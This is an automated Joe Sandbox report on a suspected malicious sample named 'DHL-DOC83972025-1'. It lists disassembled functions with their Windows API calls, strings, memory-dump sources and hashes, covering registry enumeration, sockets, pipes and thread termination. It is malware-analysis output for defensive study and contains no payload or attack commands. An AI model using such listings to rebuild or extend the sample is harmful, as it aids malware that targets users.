MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00457769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0045778F
SysAllocString.OLEAUT32(00000000), ref: 00457792
SysAllocString.OLEAUT32(?), ref: 004577B0
SysFreeString.OLEAUT32(?), ref: 004577B9
StringFromGUID2.OLE32(?,?,00000028), ref: 004577DE
SysAllocString.OLEAUT32(?), ref: 004577EC

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 6a0df6f54fded712885bf3f1b71cb6350cf176956e06b15dd2d86030fed0613a
Instruction ID: d533f0c90f74d5267fa8e412a54d187f00867125110fdab2c7b0f349a79e0074
Opcode Fuzzy Hash: 6a0df6f54fded712885bf3f1b71cb6350cf176956e06b15dd2d86030fed0613a
Instruction Fuzzy Hash: B921A176604219AFDB10DFA8EC88CBB77ACEB09764700843AFD04DB291D674EC458B68

Function 004577FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00457842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00457868
SysAllocString.OLEAUT32(00000000), ref: 0045786B
SysAllocString.OLEAUT32 ref: 0045788C
SysFreeString.OLEAUT32 ref: 00457895
StringFromGUID2.OLE32(?,?,00000028), ref: 004578AF
SysAllocString.OLEAUT32(?), ref: 004578BD

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 1e37b6d0581ce16e7c2e16b62b99445cc6203666c43e4a099713f90122ca716e
Instruction ID: d5877a8f0f4abcbddc27c7edee66637174c27bb29250375e206213e958c0f864
Opcode Fuzzy Hash: 1e37b6d0581ce16e7c2e16b62b99445cc6203666c43e4a099713f90122ca716e
Instruction Fuzzy Hash: F5217731604114AFDB10AFA9EC8CDAB77ECEB097617108536F915CB2A2D674DC49CB78

Function 004604D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 004604F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0046052E

Strings

nul, xrefs: 00460567

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 5367b4b7f5ffb1a580b9f42ee2e5a7cb9eb02112a95a219b35b183c68f173425
Instruction ID: 0dbf230db5884ec295f617ece842c0e2cc6f96f0111282230d4174591bb19b2d
Opcode Fuzzy Hash: 5367b4b7f5ffb1a580b9f42ee2e5a7cb9eb02112a95a219b35b183c68f173425
Instruction Fuzzy Hash: 42216D75500305ABDB209F29DC44A9B77A4AF45724F204A2AF8A2D62E0F7749951CF29

Function 004605A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004605C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00460601

Strings

nul, xrefs: 00460639

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: b0ecbcda85782d1fef2eb4c8d8c48c989c91a3a73d938ae433bddaac5ac33c8f
Instruction ID: 4d1541fee30c211a2f062298cbcfc861c7d3724d49e4a6d43f37588eb8524a85
Opcode Fuzzy Hash: b0ecbcda85782d1fef2eb4c8d8c48c989c91a3a73d938ae433bddaac5ac33c8f
Instruction Fuzzy Hash: 652183755003059BDB209F69DC44A9B77E4AF95724F200A1AF8A1E73E0E7749861CB2A

Function 004840AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003F600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003F604C
Part of subcall function 003F600E: GetStockObject.GDI32(00000011), ref: 003F6060
Part of subcall function 003F600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 003F606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00484112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00484139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00484145

Strings

Msctls_Progress32, xrefs: 004840E3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 78cc188cb5d3c9e4c49a65c97e37d98b94f0f8523844e661962dc4e8e12f1f66
Instruction ID: 65bef063fa6f10532bc5e3f1f2f62f404983986353257fbc1a3ce481038c4555
Opcode Fuzzy Hash: 78cc188cb5d3c9e4c49a65c97e37d98b94f0f8523844e661962dc4e8e12f1f66
Instruction Fuzzy Hash: A411D3B115021A7EEF119F64CC85EEB7F5DEF08398F014111BA18A2150CB769C219BA4

Function 0042D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042D7A3: _free.LIBCMT ref: 0042D7CC

_free.LIBCMT ref: 0042D82D

Part of subcall function 004229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000), ref: 004229DE
Part of subcall function 004229C8: GetLastError.KERNEL32(00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000,00000000), ref: 004229F0

_free.LIBCMT ref: 0042D838
_free.LIBCMT ref: 0042D843
_free.LIBCMT ref: 0042D897
_free.LIBCMT ref: 0042D8A2
_free.LIBCMT ref: 0042D8AD
_free.LIBCMT ref: 0042D8B8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: cbba1242cf76be80aa107b77dbc11bd47c3308b046ae1a59affd0977960c5973
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 331151B1B40B24BAD521BFB2EC47FCB7BDC6F44704FC0082EB2D9A6092DA6DB5454654

Function 0045DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0045DA74
LoadStringW.USER32(00000000), ref: 0045DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0045DA91
LoadStringW.USER32(00000000), ref: 0045DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0045DAB9

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: a51fb2b9a1add36f63a0a39218f6ad919f8f721b597aa5585aea0b4d0f5dff54
Instruction ID: 86c0e5dc60bcd9592ff5a18f621cf454be46611acc376a03ae1b87aca79c49ba
Opcode Fuzzy Hash: a51fb2b9a1add36f63a0a39218f6ad919f8f721b597aa5585aea0b4d0f5dff54
Instruction Fuzzy Hash: AB013BF69002087FE711A7A49DC9EEB776CEB04705F444867B745E2041E6749D844F79

Function 0046096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00DDE3E0,00DDE3E0), ref: 0046097B
EnterCriticalSection.KERNEL32(00DDE3C0,00000000), ref: 0046098D
TerminateThread.KERNEL32(004C4418,000001F6), ref: 0046099B
WaitForSingleObject.KERNEL32(004C4418,000003E8), ref: 004609A9
CloseHandle.KERNEL32(004C4418), ref: 004609B8
InterlockedExchange.KERNEL32(00DDE3E0,000001F6), ref: 004609C8
LeaveCriticalSection.KERNEL32(00DDE3C0), ref: 004609CF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 29de9d8fa119c632128595272167775245ea5a808c63b50cd6ef144aa66eab2c
Instruction ID: ef34c5400e9c045df47060088d17aeb6c40dc9a32a8ba49d9f0e070ac5ec7bd6
Opcode Fuzzy Hash: 29de9d8fa119c632128595272167775245ea5a808c63b50cd6ef144aa66eab2c
Instruction Fuzzy Hash: B6F01D71442902ABD7415B94EECCADA7B25BF01712F40242AF101508A0D7749465CFA8

Function 00471C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00471DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00471DE1
WSAGetLastError.WSOCK32 ref: 00471DF2
htons.WSOCK32(?,?,?,?,?), ref: 00471EDB
inet_ntoa.WSOCK32(?), ref: 00471E8C

Part of subcall function 004539E8: _strlen.LIBCMT ref: 004539F2

Part of subcall function 00473224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0046EC0C), ref: 00473240

_strlen.LIBCMT ref: 00471F35

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: fe9f67207467d4c2e317dbbab1ce084943110dad73e860a01efd7a25f37bc418
Instruction ID: f4c5f1d13c1d74ee4318c3118ed7afa296cdac17f106fe960708228455b3d219
Opcode Fuzzy Hash: fe9f67207467d4c2e317dbbab1ce084943110dad73e860a01efd7a25f37bc418
Instruction Fuzzy Hash: 98B1DF70204300AFC324DF28C891E6A7BA5AF84318F54895EF55A5F3E2CB35ED46CB96

Function 004201B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 004200BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004200D6
__allrem.LIBCMT ref: 004200ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042010B
__allrem.LIBCMT ref: 00420122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00420140

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 9afd728bf78528d33ddea05b7b68c68854bbbf4e3791c0cc6ed274505f208177
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: F3811671B007129BE7209A29EC41BAB73E9AF41328F64412FF511D7382E7B9D9428798

Function 004261FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004182D9,004182D9,?,?,?,0042644F,00000001,00000001,8BE85006), ref: 00426258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0042644F,00000001,00000001,8BE85006,?,?,?), ref: 004262DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004263D8
__freea.LIBCMT ref: 004263E5

Part of subcall function 00423820: RtlAllocateHeap.NTDLL(00000000,?,004C1444,?,0040FDF5,?,?,003FA976,00000010,004C1440,003F13FC,?,003F13C6,?,003F1129), ref: 00423852

__freea.LIBCMT ref: 004263EE
__freea.LIBCMT ref: 00426413

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: d09a7b82560bad3d8b21db730205a5a0e1246f118c2e66cc2301057749868281
Instruction ID: 34fe021adbb77e755b057b766828e16fbcc94b74aabafedccb2a05bd61310cc1
Opcode Fuzzy Hash: d09a7b82560bad3d8b21db730205a5a0e1246f118c2e66cc2301057749868281
Instruction Fuzzy Hash: DB51F472700226ABDB259F64EC81EAF77A9EF44714F96466EFC05D6240DB3CDC40CA68

Function 0047BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

Part of subcall function 0047C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047B6AE,?,?), ref: 0047C9B5
Part of subcall function 0047C998: _wcslen.LIBCMT ref: 0047C9F1
Part of subcall function 0047C998: _wcslen.LIBCMT ref: 0047CA68
Part of subcall function 0047C998: _wcslen.LIBCMT ref: 0047CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0047BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0047BD25
RegCloseKey.ADVAPI32(00000000), ref: 0047BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0047BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0047BDF3
RegCloseKey.ADVAPI32(?), ref: 0047BDFF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: afbcea6561022eea3cfa97d53d82e710a3b7db323eec451e1adb659bc5663cb8
Instruction ID: 7603340aba0bda48f29219b23a6c1372181d713bd00339b738c7fe835240a149
Opcode Fuzzy Hash: afbcea6561022eea3cfa97d53d82e710a3b7db323eec451e1adb659bc5663cb8
Instruction Fuzzy Hash: DE818970208241AFC715DF24C881F6ABBE5FF84308F14896EF5598B2A2DB35ED45CB96

Function 0044F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0044F7B9
SysAllocString.OLEAUT32(00000001), ref: 0044F860
VariantCopy.OLEAUT32(0044FA64,00000000), ref: 0044F889
VariantClear.OLEAUT32(0044FA64), ref: 0044F8AD
VariantCopy.OLEAUT32(0044FA64,00000000), ref: 0044F8B1
VariantClear.OLEAUT32(?), ref: 0044F8BB

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: a834d795057427de821a448f52c0272a723096d23d8817154d2a08eab08b18ab
Instruction ID: c719a68ebcd049e000274489fcd53646e2607ede520dcf2e4ffec57187c8777a
Opcode Fuzzy Hash: a834d795057427de821a448f52c0272a723096d23d8817154d2a08eab08b18ab
Instruction Fuzzy Hash: A251E771A00310BAEF24AB65D895B29B3A4EF45714B24847BE906DF291DB788C48C76F

Function 0046910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 003F7620: _wcslen.LIBCMT ref: 003F7625

Part of subcall function 003F6B57: _wcslen.LIBCMT ref: 003F6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 004694E5
_wcslen.LIBCMT ref: 00469506
_wcslen.LIBCMT ref: 0046952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00469585

Strings

X, xrefs: 00469412

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 4ca8749ed4f6aca0dce49ea472399bdcd2e7e68b6215202ffbab003f5dcb2760
Instruction ID: a132103b52f64ca81d8ab58065db7a1d7215a6eb5088ac3b468a2556cf713ad0
Opcode Fuzzy Hash: 4ca8749ed4f6aca0dce49ea472399bdcd2e7e68b6215202ffbab003f5dcb2760
Instruction Fuzzy Hash: B8E1BF716083009FC725DF24C881A6AB7E4BF85314F04896EF9899B3A2EB74DD45CB96

Function 0040920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00409BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00409BB2

BeginPaint.USER32(?,?,?), ref: 00409241
GetWindowRect.USER32(?,?), ref: 004092A5
ScreenToClient.USER32(?,?), ref: 004092C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004092D3
EndPaint.USER32(?,?,?,?,?), ref: 00409321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004471EA

Part of subcall function 00409339: BeginPath.GDI32(00000000), ref: 00409357

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: ad838697b4298fe13d3bd8975c263a9c05ff9c6f862568c1b1195ffae116e0b6
Instruction ID: d372052d295b3b7446b610ed212f2def32226561701a6a69fe5d01f36d020ca7
Opcode Fuzzy Hash: ad838697b4298fe13d3bd8975c263a9c05ff9c6f862568c1b1195ffae116e0b6
Instruction Fuzzy Hash: FD418D70104201AFD711DF25CC84FAA7BA8EB4A324F14067EF954962F2C7359C46DB6A

Function 004607EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0046080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00460847
EnterCriticalSection.KERNEL32(?), ref: 00460863
LeaveCriticalSection.KERNEL32(?), ref: 004608DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004608F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00460921

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

